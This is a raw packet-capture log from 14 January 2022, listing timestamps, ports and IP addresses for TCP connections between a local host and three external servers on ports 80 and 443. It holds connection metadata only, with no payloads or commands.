Jan 14, 2022 00:16:00.176927090 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.176944017 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.176965952 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177023888 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177036047 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177084923 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177138090 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177194118 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177196980 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177252054 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177252054 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177310944 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177370071 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177412987 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177413940 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177453041 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177468061 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177490950 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177530050 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177548885 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177570105 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177608013 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177638054 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177648067 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177686930 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177704096 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177726984 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177766085 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177778959 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177803993 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177844048 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177861929 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.177928925 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177975893 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.177993059 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178013086 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178052902 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178067923 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178092003 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178131104 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178163052 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178170919 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178209066 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178232908 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178251028 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178291082 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178312063 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178333044 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178371906 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178392887 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178411007 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178452015 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178467035 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178491116 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178529978 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178543091 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178567886 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178606987 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178622007 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178644896 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178683043 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178706884 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178720951 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178760052 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178777933 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.178800106 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.178853035 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.256572962 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256625891 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256665945 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256706953 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256716967 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.256745100 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256771088 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.256784916 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256827116 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256864071 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256875992 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.256902933 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256941080 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.256953955 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.256979942 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257014036 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257031918 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257067919 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257097006 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257107019 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257145882 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257158995 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257181883 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257220984 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257227898 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257258892 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257297993 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257313013 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257339954 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257376909 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257390976 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257416010 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257453918 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257471085 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257493019 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257533073 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257545948 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257570982 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257611036 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257649899 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257651091 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257687092 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257699966 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257726908 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257766008 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257772923 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257802963 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257842064 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257848024 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257910967 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257947922 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.257972002 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.257987022 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258027077 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258034945 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.258064032 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258102894 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258106947 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.258141041 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258181095 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258186102 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.258222103 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258258104 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258266926 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.258296967 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258337975 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258347988 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.258374929 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258414030 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258420944 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.258454084 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.258497953 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341245890 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341283083 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341305971 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341327906 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341351032 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341373920 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341397047 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341408968 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341419935 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341442108 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341464996 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341485977 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341494083 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341509104 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341530085 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341531038 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341536045 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341552973 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341564894 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341571093 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341579914 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341602087 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341619968 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341641903 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341648102 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341654062 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341662884 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341685057 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341707945 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341710091 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341731071 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341743946 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341753960 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341775894 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341782093 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341798067 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341820002 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341830969 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.341840982 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341883898 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341906071 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341928005 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341949940 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341973066 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.341994047 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342015982 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342036963 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342058897 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342082024 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342106104 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342118025 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342128992 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342153072 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342175007 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342195034 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342197895 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342206001 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342211008 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342216015 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342219114 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342220068 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342225075 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342230082 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342233896 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342242002 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342266083 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342287064 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342293978 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342310905 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342334032 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.342770100 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.342828035 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.420821905 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.420876980 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.420922041 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.420949936 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.420968056 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421006918 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421041012 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421055079 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421099901 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421118975 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421145916 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421190977 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421210051 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421236992 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421284914 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421308041 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421334982 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421376944 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421397924 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421422005 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421468019 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421478987 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421513081 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421557903 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421566963 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421600103 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421647072 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421649933 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421693087 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421736002 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421749115 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421782017 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421825886 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421844006 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421905041 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421951056 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.421969891 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.421998024 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422043085 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422050953 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422086954 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422131062 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422139883 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422172070 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422214985 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422234058 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422261000 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422307968 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422312021 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422353983 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422399044 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422406912 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422446012 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422494888 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422497034 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422537088 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422586918 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422588110 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422631979 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422681093 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422682047 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422727108 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422769070 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422780037 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422816038 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422861099 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422869921 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422904015 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422951937 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.422955990 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.422992945 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423038006 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423048973 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.423082113 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423121929 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423141003 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.423167944 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423214912 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423221111 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.423258066 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423304081 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423310995 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:00.423351049 CET	80	49887	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:00.423409939 CET	49887	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:02.066602945 CET	49888	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.118021965 CET	80	49888	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.118149996 CET	49888	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.118275881 CET	49888	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.118489027 CET	49888	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.170634031 CET	80	49888	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.170679092 CET	80	49888	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.197556019 CET	80	49888	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.199604988 CET	49888	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.199773073 CET	49888	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.244338036 CET	49889	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.254060984 CET	80	49888	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.297986984 CET	80	49889	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.298145056 CET	49889	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.298337936 CET	49889	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.298407078 CET	49889	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.350121975 CET	80	49889	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.350164890 CET	80	49889	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.378993988 CET	80	49889	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.379589081 CET	49889	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.379633904 CET	49889	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.410876036 CET	49890	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.432550907 CET	80	49889	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.463712931 CET	80	49890	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.464684963 CET	49890	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.469254017 CET	49890	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.469297886 CET	49890	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.520026922 CET	80	49890	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.560971022 CET	80	49890	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.561094046 CET	49890	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.561252117 CET	49890	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:02.610129118 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.610184908 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.610305071 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.611459970 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.611494064 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.612797976 CET	80	49890	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:02.663486004 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.663635015 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.665146112 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.665167093 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.665625095 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.666764021 CET	49891	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:02.709881067 CET	443	49891	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:02.786046982 CET	443	49891	144.76.136.153	192.168.2.4
